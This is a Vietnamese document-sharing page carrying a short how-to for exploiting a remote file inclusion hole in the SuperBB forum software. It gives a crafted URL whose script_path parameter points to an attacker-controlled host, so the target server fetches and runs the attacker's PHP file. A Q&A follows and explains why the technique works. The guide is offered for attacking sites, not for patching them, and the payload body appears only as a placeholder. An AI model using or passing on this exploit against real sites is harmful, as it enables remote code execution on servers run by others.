intTypePromotion=1
zunia.vn Tuyển sinh 2024 dành cho Gen-Z zunia.vn zunia.vn
ADSENSE
 » 
 » 

Khai thác lỗi bảo mật forum SuperBB

Chia sẻ: ™——† Lvlr. DK †——™ »»» V.I.P ««« | Ngày: | Loại File: PDF | Số trang:1

Thêm vào BST
Báo xấu
172
lượt xem 20
download
 
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Khai thác lỗi bảo mật forum SuperBB : Tạo trên host http://[attacker]/lang/1/1_options.php Chạy trên trình duyệt http://[target]/include/options_form.php?script_path=http://[attacker]&lang_cod e=1 Cách test: 1. Đăng ký một host ko support PHP. 2. Tạo trên host đó một folder named lang, trong folder lang tạo folder named 1, trong folder 1 tạo một file tên là 1_options.php với nội dung như sau: CODE Chạy trên trình duyệt http://[target]/include/options_form.php?script_path=http://[attacker]&lang_cod e=1 Nếu thấy có dòng chữ "Hello world" thì OK, site đang test bị lỗi này Câu hỏi: 1. SupperBB vuln là gì? 2. Làm sao đăng kí host trên server đó được ( nếu...

Chủ đề:

Bình luận(0) Đăng nhập để gửi bình luận!

Lưu

Nội dung Text: Khai thác lỗi bảo mật forum SuperBB

  1. Khai thác lỗi bảo mật forum SuperBB : Tạo trên host http://[attacker]/lang/1/1_options.php Chạy trên trình duyệt http://[target]/include/options_form.php?script_path=http://[attacker]&lang_cod e=1 Cách test: 1. Đăng ký một host ko support PHP. 2. Tạo trên host đó một folder named lang, trong folder lang tạo folder named 1, trong folder 1 tạo một file tên là 1_options.php với nội dung như sau: CODE Chạy trên trình duyệt http://[target]/include/options_form.php?script_path=http://[attacker]&lang_cod e=1 Nếu thấy có dòng chữ "Hello world" thì OK, site đang test b ị lỗi này Câu hỏi: 1. SupperBB vuln là gì? 2. Làm sao đăng kí host trên server đó được ( nếu họ ko cho ) 3. Host ko support php thì làm sao hiển thị cái file 1_options.php được? 4. Tại sao lại phải tạo folder lang rồi tạo folder name 1 rồi tạo file 1_options.php , mục đích là để làm gì? 5. Site đang test bị lỗi này thì mình làm được gì với lỗi đó? Trả lời : 1. Là lỗi bảo mật của forum SuperBB 2. Không cần đăng ký host trên server đó, đăng ký host ở đâu cũng được (nhưng ko được support PHP) 3. Được, vì cái file 1_options.php ko phải được run trên host của mình mà được inject vào code trên host của victim 4. Bởi vì script forum nó include đến file 1_options.php ở trong cấu trúc thư mục như thế 5. Làm được gì là tuỳ vào kinh nghiệm mỗi ngư ời
ADSENSE

CÓ THỂ BẠN MUỐN DOWNLOAD

THÔNG TIN
TRỢ GIÚP
HỖ TRỢ KHÁCH HÀNG
Theo dõi chúng tôi

Chịu trách nhiệm nội dung:

Nguyễn Công Hà - Giám đốc Công ty TNHH TÀI LIỆU TRỰC TUYẾN VI NA

LIÊN HỆ

Địa chỉ: P402, 54A Nơ Trang Long, Phường 14, Q.Bình Thạnh, TP.HCM

Hotline: 093 303 0098

Email: support@tailieu.vn

Giấy phép Mạng Xã Hội số: 670/GP-BTTTT cấp ngày 30/11/2015 Copyright © 2022-2032 TaiLieu.VN. All rights reserved.

 

Đồng bộ tài khoản
2=>2